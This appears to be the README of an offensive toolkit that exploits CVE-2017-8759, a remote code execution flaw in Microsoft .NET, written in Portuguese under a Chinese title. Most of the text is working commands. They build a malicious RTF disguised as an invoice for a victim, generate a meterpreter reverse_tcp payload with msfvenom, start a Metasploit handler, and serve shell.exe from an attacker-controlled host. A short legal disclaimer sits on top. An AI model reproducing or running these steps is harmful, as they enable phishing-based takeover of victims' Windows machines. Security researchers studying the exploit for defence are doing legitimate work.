
CVE-2017-8759 微软word漏洞利用脚本
A ferramenta de exploração CVE-2017-8759 é um prático script Python que oferece a testadores de penetração e pesquisadores de segurança uma maneira rápida e eficaz de testar a execução remota de código (RCE) no Microsoft .NET Framework. Ela pode gerar um arquivo RTF malicioso e entregar metasploit / meterpreter / outros payloads à vítima sem nenhuma configuração complexa.
Este programa é apenas para fins educacionais. Não o utilize sem permissão. O aviso legal habitual se aplica, especialmente o fato de que eu (bhdresh) não sou responsável por quaisquer danos causados pelo uso direto ou indireto das informações ou funcionalidades fornecidas por estes programas. O autor ou qualquer provedor de Internet NÃO assume responsabilidade pelo conteúdo ou uso inadequado destes programas ou de qualquer derivado deles. Ao usar este programa, você aceita que qualquer dano (perda de dados, falha do sistema, comprometimento do sistema, etc.) causado pelo uso destes programas não é de responsabilidade do bhdresh.
Por fim, este é um desenvolvimento pessoal, por favor respeite sua filosofia e não o use para coisas ruins!
Foram introduzidas as seguintes funcionalidades no script
- Gerar arquivo RTF malicioso
- Modo de exploração para o arquivo RTF gerado
Versão: Python versão 2.7.13
1) Gerar arquivo RTF malicioso
# python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.txt
2) (Opcional, se usar payload MSF): Gerar payload metasploit e iniciar handler
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
# msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
3) Iniciar toolkit no modo de exploração para entregar payload local
# python cve-2017-8759_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
# python cve-2017-8759_toolkit.py -h
Esta é uma prática ferramenta para explorar CVE-2017-8759 (RCE no Microsoft .NET Framework)
Modos:
-M gen Gerar apenas arquivo malicioso
Gerar arquivo RTF/PPSX malicioso:
-w <Filename.rtf> Nome do arquivo RTF malicioso (Compartilhe este arquivo com a vítima).
-u <http://attacker.com/test.txt> Caminho do arquivo txt remoto. Normalmente, deve ser um domínio ou IP onde esta ferramenta está sendo executada.
Por exemplo, http://attackerip.com/test.txt (Este URL será incluído no arquivo RTF malicioso e será solicitado quando a vítima abrir o arquivo RTF malicioso.
-M exp Iniciar modo de exploração
Exploração:
-p <TCP port:Default 80> Número da porta local.
-e <http://attacker.com/shell.exe> O caminho de um arquivo executável / shell meterpreter / payload que precisa ser executado no alvo.
-l </tmp/shell.exe> Especificar o caminho local de um arquivo executável / shell meterpreter / payload.